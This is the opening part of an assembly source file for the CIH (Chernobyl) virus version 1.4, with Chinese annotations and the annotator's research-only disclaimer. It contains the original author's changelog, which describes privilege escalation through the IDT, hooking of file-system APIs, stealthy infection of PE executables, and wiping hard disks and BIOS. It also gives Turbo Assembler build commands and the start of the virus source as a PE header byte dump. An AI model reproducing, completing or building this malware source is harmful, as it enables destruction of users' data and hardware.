cih14.asm

有名的CIH病毒1.4版本之中文注释,有asm源代码及doc说明

;CIH病毒1.4版本之中文注释由"邹丹"编写完成于1999-4-09
;源程序中的英文注释未作修改,全部保留
;电子邮件: zd_dan@263.net     
;个人主页: zdweb.yeah.net                                                                             
;本人所编写之注释仅供研究之用，如作其他用途，概于本人无关！！！
;!!!!!!后附精彩后记,敬请留意!!!!!!

; ****************************************************************************   
; *                     The Virus Program Information                        *   
; ****************************************************************************   
; *                                                                          *   
; *     Designer : CIH                  Source : TTIT of TATUNG in Taiwan    *   
; *     Create Date : 04/26/1998        Now Version : 1.4                    *   
; *     Modification Time : 05/31/1998                                       *   
; *                                                                          *   
; *     Turbo Assembler Version 4.0     : tasm /m cih                        *   
; *     Turbo Link Version 3.01         : tlink /3 /t cih, cih.exe           * ;编译连接方法  
; *                                                                          * ;使用的是TurboAssembler  
; *==========================================================================* ;可在Borland C++ 3.1中找到  
; *                     Modification History                                 *   
; *==========================================================================*   
; *     v1.0    1. Create the Virus Program.                                 *   
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *   
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *   
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *   
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *   
; *             6. When System Opens Existing PE File, the File will be      *   
; *                Infected, and the File doesn't be Reinfected.             *   
; *             7. It is also Infected, even the File is Read-Only.          *   
; *             8. When the File is Infected, the Modification Date and Time *   
; *                of the File also don't be Changed.                        *   
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *   
; *                Previous FileSystemApiHook, it will Call the Function     *   
; *                that the IFS Manager Would Normally Call to Implement     *   
; *                this Particular I/O Request.                              *   
; *            10. The Virus Size is only 656 Bytes.                         *   
; *==========================================================================*   
; *     v1.1    1. Especially, the File that be Infected will not Increase   *   
; *                it's Size...   ^__^                                       *   
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *   
; *                When Exception Error Occurs, Our OS System should be in   *   
; *                Windows NT. So My Cute Virus will not Continue to Run,    *   
; *                it will Jmup to Original Application to Run.              *   
; *             3. Use Better Algorithm, Reduce Virus Code Size.             *   
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *   
; *==========================================================================*   
; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *   
; *             2. Modify the Bug of v1.1                                    *   
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *   
; *==========================================================================*   
; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *   
; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *   
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *   
; *==========================================================================*   
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *   
; *             2. Change the Date of Killing Computers.                     *   
; * 05/31/1998  3. Modify Virus Version Copyright.                           *   
; *             4. The Virus "Basic" Size is 1019 Bytes.                     *   
; ****************************************************************************   
                                                                                 
                .586P                                              ;586保护模式汇编              
                                                                                 
; ****************************************************************************   
; *             Original PE Executable File(Don't Modify this Section)       *   
; ****************************************************************************   
                                                                                 
OriginalAppEXE  SEGMENT                                                          
                                                                                 
FileHeader:                                                        ;编译连接后的PE格式可执行文件文件头              
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h           
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h           
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h           
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh           
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h           
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h           
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh           
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh           
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h           
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah           
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h           
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h           
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h           
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h           
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h           
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h           
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h           
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h